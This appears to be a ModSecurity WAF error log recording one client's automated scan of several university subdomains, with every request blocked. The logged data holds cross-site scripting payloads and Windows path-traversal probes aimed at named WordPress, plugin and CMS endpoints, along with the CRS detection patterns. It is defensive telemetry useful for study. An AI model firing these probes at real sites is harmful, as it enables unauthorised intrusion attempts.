[Tue Aug 29 11:56:25.654996 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:searchTerm: x'+alert(1)+'x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16ecCo-f0AAAq-HawAAAAT"]
[Tue Aug 29 11:56:25.693307 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAAq-Ha4AAAAT"]
[Tue Aug 29 11:56:25.731716 2023] [:error] [pid 2760] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArIAUgAAAAX"]
[Tue Aug 29 11:56:25.754966 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ecCo-f0AAArLLeIAAAAb"]
[Tue Aug 29 11:56:26.965184 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16esCo-f0AAArKv2UAAAAa"]
[Tue Aug 29 11:56:26.999953 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchTerm. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ),// found within ARGS:searchTerm: x\\x5c' alert(1),//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/NetBiblio/search/shortview"] [unique_id "ZO16esCo-f0AAAqeFocAAAAx"]
[Tue Aug 29 11:56:27.034520 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq-HbMAAAAT"]
[Tue Aug 29 11:56:27.123728 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArMmqEAAAAf"]
[Tue Aug 29 11:56:27.125117 2023] [:error] [pid 2759] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArHa1wAAAAJ"]
[Tue Aug 29 11:56:27.125282 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq3a@cAAAAI"]
[Tue Aug 29 11:56:27.125399 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAAq5@Q8AAAAK"]
[Tue Aug 29 11:56:27.772889 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:redirect_to. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:redirect_to: \\x22><img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16e8Co-f0AAApHRoUAAAAP"]
[Tue Aug 29 11:56:27.776820 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:referer. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:referer: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/src/login.php"] [unique_id "ZO16e8Co-f0AAArMmqQAAAAf"]
[Tue Aug 29 11:56:29.736835 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAArLLekAAAAb"]
[Tue Aug 29 11:56:29.839066 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fcCo-f0AAAocyi4AAAAR"]
[Tue Aug 29 11:56:30.067533 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArB104AAAAV"]
[Tue Aug 29 11:56:30.086741 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArB108AAAAV"]
[Tue Aug 29 11:56:30.132634 2023] [:error] [pid 2764] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAArMmq0AAAAf"]
[Tue Aug 29 11:56:30.535097 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:class_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:class_key: ../../../../../../../../../../windows/win.ini\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/manager/controllers/default/resource/tvs.php"] [unique_id "ZO16fsCo-f0AAAocyjQAAAAR"]
[Tue Aug 29 11:56:30.560246 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAqeFo0AAAAx"]
[Tue Aug 29 11:56:30.563538 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAoAlB4AAAAC"]
[Tue Aug 29 11:56:30.563564 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAArB11QAAAAV"]
[Tue Aug 29 11:56:30.589379 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAocyjYAAAAR"]
[Tue Aug 29 11:56:30.608695 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAq@slUAAAAM"]
[Tue Aug 29 11:56:30.609643 2023] [:error] [pid 2763] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAArLLfMAAAAb"]
[Tue Aug 29 11:56:30.628770 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAArB11cAAAAV"]
[Tue Aug 29 11:56:30.629716 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAAocyjgAAAAR"]
[Tue Aug 29 11:56:30.630371 2023] [:error] [pid 2762] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16fsCo-f0AAArKv24AAAAa"]
[Tue Aug 29 11:56:30.631271 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/ssh_form.php"] [unique_id "ZO16fsCo-f0AAAq5@R0AAAAK"]
[Tue Aug 29 11:56:31.795408 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22/></ found within ARGS:page: \\x22/></script><script>alert(document.domain)</script><b"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php"] [unique_id "ZO16f8Co-f0AAAqeFpQAAAAx"]
